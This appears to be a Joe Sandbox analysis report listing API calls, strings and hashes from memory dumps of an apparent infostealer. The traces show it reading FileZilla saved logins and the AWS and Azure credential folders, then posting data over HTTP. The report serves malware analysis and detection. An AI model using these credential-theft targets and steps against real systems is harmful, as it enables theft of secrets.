                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                        • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                        • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                        • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192054558.00000000024AE000.00000040.00000020.00020000.00000000.sdmp, Offset: 024AE000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_24ae000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                        • Instruction ID: 2b2d24adee68b2e3c4f14f6cee862f78f0bba3c7c323759d8acab3de1363fcd3
                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                        • Instruction Fuzzy Hash: 1511C2723401009FD754CF55DCA0EA673EAEB9C320B1A8056ED04CB711D676E846CB60
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                        • Instruction ID: 27bfe31bfb35ad12db8d1555e65b8e29a56a6146f1affa9217d62723929b1f3d
                        • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                        • Instruction Fuzzy Hash: 2E01DB776016088FDF21CFA4C804BAA33F5FB86315F4544B5E506E7241E774B941CB90
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: free
                        • String ID:
                        • API String ID: 1294909896-0
                        • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                        • Instruction ID: a0af666c7ba9f6ee54153b0f7328413c8dbc2d987e7bea5e274101a809a74797
                        • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                        • Instruction Fuzzy Hash: 1771C131551A40DBF7623B31DD01ECA7AA27F0870EF104924A1DB39670DEB278659ED9
                        APIs
                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                          • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                          • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                          • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                          • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                          • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                          • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                          • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                          • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                        • strtok_s.MSVCRT ref: 0041031B
                        • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00410362
                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410369
                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 00410385
                        • lstrlenA.KERNEL32(00000000), ref: 00410393
                          • Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
                          • Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903
                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 004103CF
                        • lstrlenA.KERNEL32(00000000), ref: 004103DD
                        • StrStrA.SHLWAPI(00000000,<User>), ref: 00410419
                        • lstrlenA.KERNEL32(00000000), ref: 00410427
                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00410463
                        • lstrlenA.KERNEL32(00000000), ref: 00410475
                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410502
                        • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041051A
                        • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410532
                        • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041054A
                        • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00410562
                        • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00410571
                        • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00410580
                        • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410593
                        • lstrcatA.KERNEL32(?,00421678,?,?,00000000), ref: 004105A2
                        • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105B5
                        • lstrcatA.KERNEL32(?,0042167C,?,?,00000000), ref: 004105C4
                        • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 004105D3
                        • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105E6
                        • lstrcatA.KERNEL32(?,00421688,?,?,00000000), ref: 004105F5
                        • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410604
                        • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410617
                        • lstrcatA.KERNEL32(?,00421698,?,?,00000000), ref: 00410626
                        • lstrcatA.KERNEL32(?,0042169C,?,?,00000000), ref: 00410635
                        • strtok_s.MSVCRT ref: 00410679
                        • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041068E
                        • memset.MSVCRT ref: 004106DD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                        • API String ID: 337689325-514892060
                        • Opcode ID: 3bc2c577a6fe1a4c48c4c66cd480b769372ba09bd9cd762d3494ee533b5cfef0
                        • Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
                        • Opcode Fuzzy Hash: 3bc2c577a6fe1a4c48c4c66cd480b769372ba09bd9cd762d3494ee533b5cfef0
                        • Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69
                        APIs
                        • lstrlen.KERNEL32(00424D98), ref: 040A4833
                        • lstrlen.KERNEL32(00424E48), ref: 040A483E
                        • lstrlen.KERNEL32(00424F10), ref: 040A4849
                        • lstrlen.KERNEL32(00424FC8), ref: 040A4854
                        • lstrlen.KERNEL32(00425070), ref: 040A485F
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 040A486E
                        • RtlAllocateHeap.NTDLL(00000000), ref: 040A4875
                        • lstrlen.KERNEL32(00425118), ref: 040A4883
                        • lstrlen.KERNEL32(004251C0), ref: 040A488E
                        • lstrlen.KERNEL32(00425268), ref: 040A4899
                        • lstrlen.KERNEL32(00425310), ref: 040A48A4
                        • lstrlen.KERNEL32(004253B8), ref: 040A48AF
                        • lstrlen.KERNEL32(00425460), ref: 040A48C3
                        • lstrlen.KERNEL32(00425508), ref: 040A48CE
                        • lstrlen.KERNEL32(004255B0), ref: 040A48D9
                        • lstrlen.KERNEL32(00425658), ref: 040A48E4
                        • lstrlen.KERNEL32(00425700), ref: 040A48EF
                        • lstrlen.KERNEL32(004257A8), ref: 040A4918
                        • lstrlen.KERNEL32(00425850), ref: 040A4923
                        • lstrlen.KERNEL32(00425918), ref: 040A492E
                        • lstrlen.KERNEL32(004259C0), ref: 040A4939
                        • lstrlen.KERNEL32(00425A68), ref: 040A4944
                        • strlen.MSVCRT ref: 040A4957
                        • lstrlen.KERNEL32(00425B10), ref: 040A497F
                        • lstrlen.KERNEL32(00425BB8), ref: 040A498A
                        • lstrlen.KERNEL32(00425C60), ref: 040A4995
                        • lstrlen.KERNEL32(00425D08), ref: 040A49A0
                        • lstrlen.KERNEL32(00425DB0), ref: 040A49AB
                        • lstrlen.KERNEL32(00425E58), ref: 040A49BB
                        • lstrlen.KERNEL32(00425F00), ref: 040A49C6
                        • lstrlen.KERNEL32(00425FA8), ref: 040A49D1
                        • lstrlen.KERNEL32(00426050), ref: 040A49DC
                        • lstrlen.KERNEL32(004260F8), ref: 040A49E7
                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 040A4A03
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                        • String ID:
                        • API String ID: 2127927946-0
                        • Opcode ID: 94e7660d446ef400bbca7e6a05bf8504b75a8e0329621672810e0e1d9e7bb62d
                        • Instruction ID: 06640b4fed8a9159e7fdea7ac742daa2456a921f9b85c55ca80d715710cc3994
                        • Opcode Fuzzy Hash: 94e7660d446ef400bbca7e6a05bf8504b75a8e0329621672810e0e1d9e7bb62d
                        • Instruction Fuzzy Hash: 7341A979740624EBC718AFE5EC89B9C7F71AB4C712BA0C062F9029A190C7F5D5119B3E
                        APIs
                        • GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 040B9B08
                        • GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 040B9B21
                        • GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 040B9B39
                        • GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 040B9B51
                        • GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 040B9B6A
                        • GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 040B9B82
                        • GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 040B9B9A
                        • GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 040B9BB3
                        • GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 040B9BCB
                        • GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 040B9BE3
                        • GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 040B9BFC
                        • GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 040B9C14
                        • GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 040B9C2C
                        • GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 040B9C45
                        • GetProcAddress.KERNEL32(0064A8B0,0064A598), ref: 040B9C5D
                        • GetProcAddress.KERNEL32(0064A8B0,0064A224), ref: 040B9C75
                        • GetProcAddress.KERNEL32(0064A8B0,0064A418), ref: 040B9C8E
                        • GetProcAddress.KERNEL32(0064A8B0,0064A634), ref: 040B9CA6
                        • GetProcAddress.KERNEL32(0064A8B0,0064A0BC), ref: 040B9CBE
                        • GetProcAddress.KERNEL32(0064A8B0,0064A12C), ref: 040B9CD7
                        • GetProcAddress.KERNEL32(0064A8B0,0064A2B0), ref: 040B9CEF
                        • LoadLibraryA.KERNEL32(0064A550,?,040B6C67), ref: 040B9D01
                        • LoadLibraryA.KERNEL32(0064A17C,?,040B6C67), ref: 040B9D12
                        • LoadLibraryA.KERNEL32(0064A104,?,040B6C67), ref: 040B9D24
                        • LoadLibraryA.KERNEL32(0064A1DC,?,040B6C67), ref: 040B9D36
                        • LoadLibraryA.KERNEL32(0064A328,?,040B6C67), ref: 040B9D47
                        • GetProcAddress.KERNEL32(0064A6D4,0064A4AC), ref: 040B9D69
                        • GetProcAddress.KERNEL32(0064A7F4,0064A424), ref: 040B9D8A
                        • GetProcAddress.KERNEL32(0064A7F4,0064A1CC), ref: 040B9DA2
                        • GetProcAddress.KERNEL32(0064A8E4,0064A394), ref: 040B9DC4
                        • GetProcAddress.KERNEL32(0064A7A8,0064A128), ref: 040B9DE5
                        • GetProcAddress.KERNEL32(0064A7D8,0064A414), ref: 040B9E06
                        • GetProcAddress.KERNEL32(0064A7D8,00420724), ref: 040B9E1D
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID:
                        • API String ID: 2238633743-0
                        • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                        • Instruction ID: 2b4f4bd6c742fb540b822c6df12fc111507254a72e416dad9698c5328f43ab40
                        • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                        • Instruction Fuzzy Hash: 66A13DBD5C0240BFE364EFE8ED889A63BFBF74E301714661AE605C3264D639A441DB52
                        APIs
                          • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                          • Part of subcall function 040B9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 040B9072
                          • Part of subcall function 040BAB87: lstrcpy.KERNEL32(00000000,?), ref: 040BABD9
                          • Part of subcall function 040BAB87: lstrcat.KERNEL32(00000000), ref: 040BABE9
                          • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                          • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                          • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                          • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                          • Part of subcall function 040BAA07: lstrcpy.KERNEL32(?,00000000), ref: 040BAA4D
                          • Part of subcall function 040A9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 040A9C53
                          • Part of subcall function 040A9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 040A9C78
                          • Part of subcall function 040A9C27: LocalAlloc.KERNEL32(00000040,?), ref: 040A9C98
                          • Part of subcall function 040A9C27: ReadFile.KERNEL32(000000FF,?,00000000,040A16F6,00000000), ref: 040A9CC1
                          • Part of subcall function 040A9C27: LocalFree.KERNEL32(040A16F6), ref: 040A9CF7
                          • Part of subcall function 040A9C27: CloseHandle.KERNEL32(000000FF), ref: 040A9D01
                          • Part of subcall function 040B9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 040B90B9
                        • strtok_s.MSVCRT ref: 040B0582
                        • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 040B05C9
                        • RtlAllocateHeap.NTDLL(00000000), ref: 040B05D0
                        • StrStrA.SHLWAPI(00000000,00421618), ref: 040B05EC
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 040B05FA
                          • Part of subcall function 040B8B47: malloc.MSVCRT ref: 040B8B4F
                          • Part of subcall function 040B8B47: strncpy.MSVCRT ref: 040B8B6A
                        • StrStrA.SHLWAPI(00000000,00421620), ref: 040B0636
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 040B0644
                        • StrStrA.SHLWAPI(00000000,00421628), ref: 040B0680
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 040B068E
                        • StrStrA.SHLWAPI(00000000,00421630), ref: 040B06CA
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 040B06DC
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 040B0769
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 040B0781
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 040B0799
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 040B07B1
                        • lstrcat.KERNEL32(?,0042164C), ref: 040B07C9
                        • lstrcat.KERNEL32(?,00421660), ref: 040B07D8
                        • lstrcat.KERNEL32(?,00421670), ref: 040B07E7
                        • lstrcat.KERNEL32(?,00000000), ref: 040B07FA
                        • lstrcat.KERNEL32(?,00421678), ref: 040B0809
                        • lstrcat.KERNEL32(?,00000000), ref: 040B081C
                        • lstrcat.KERNEL32(?,0042167C), ref: 040B082B
                        • lstrcat.KERNEL32(?,00421680), ref: 040B083A
                        • lstrcat.KERNEL32(?,00000000), ref: 040B084D
                        • lstrcat.KERNEL32(?,00421688), ref: 040B085C
                        • lstrcat.KERNEL32(?,0042168C), ref: 040B086B
                        • lstrcat.KERNEL32(?,00000000), ref: 040B087E
                        • lstrcat.KERNEL32(?,00421698), ref: 040B088D
                        • lstrcat.KERNEL32(?,0042169C), ref: 040B089C
                        • strtok_s.MSVCRT ref: 040B08E0
                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 040B08F5
                        • memset.MSVCRT ref: 040B0944
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                        • String ID:
                        • API String ID: 3689735781-0
                        • Opcode ID: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                        • Instruction ID: 4419b06d3f06bc5314e35d6d8ae95c27eeba36505f13c2558984a5383eb6ae0d
                        • Opcode Fuzzy Hash: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                        • Instruction Fuzzy Hash: 0CD15C75A40208ABDB04FBF4DD85EEEB779AF14308F544518E142B6094DF78BA05CFA9
                        APIs
                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                          • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                          • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059F8
                        • StrCmpCA.SHLWAPI(?,024D9A00), ref: 00405A13
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B93
                        • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,024DE430,00000000,?,024A89D0,00000000,?,00421A1C), ref: 00405E71
                        • lstrlenA.KERNEL32(00000000), ref: 00405E82
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00405E93
                        • HeapAlloc.KERNEL32(00000000), ref: 00405E9A
                        • lstrlenA.KERNEL32(00000000), ref: 00405EAF
                        • memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
                        • lstrlenA.KERNEL32(00000000), ref: 00405ED8
                        • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405EF1
                        • memcpy.MSVCRT(?), ref: 00405EFE
                        • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F1B
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F2F
                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F4C
                        • InternetCloseHandle.WININET(00000000), ref: 00405FB0
                        • InternetCloseHandle.WININET(00000000), ref: 00405FBD
                        • HttpOpenRequestA.WININET(00000000,024DE3B0,?,024DDF00,00000000,00000000,00400100,00000000), ref: 00405BF8
                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                        • InternetCloseHandle.WININET(00000000), ref: 00405FC7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                        • String ID: "$"$------$------$------
                        • API String ID: 1406981993-2180234286
                        • Opcode ID: 666bbb9bba4a1dc80c75d8d39e09cf3d748a28728b0d32cd90eb582302fc047f
                        • Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
                        • Opcode Fuzzy Hash: 666bbb9bba4a1dc80c75d8d39e09cf3d748a28728b0d32cd90eb582302fc047f
                        • Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69
                        APIs
                        • memset.MSVCRT ref: 00414D87
                          • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                        • lstrcatA.KERNEL32(?,00000000), ref: 00414DB0
                        • lstrcatA.KERNEL32(?,\.azure\), ref: 00414DCD
                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                          • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                        • memset.MSVCRT ref: 00414E13
                        • lstrcatA.KERNEL32(?,00000000), ref: 00414E3C
                        • lstrcatA.KERNEL32(?,\.aws\), ref: 00414E59
                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                          • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                          • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                        • memset.MSVCRT ref: 00414E9F
                        • lstrcatA.KERNEL32(?,00000000), ref: 00414EC8
                        • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00414EE5
                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                          • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,024D99F0,?,000003E8), ref: 00414A4A
                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                          • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                          • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                        • memset.MSVCRT ref: 00414F2B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
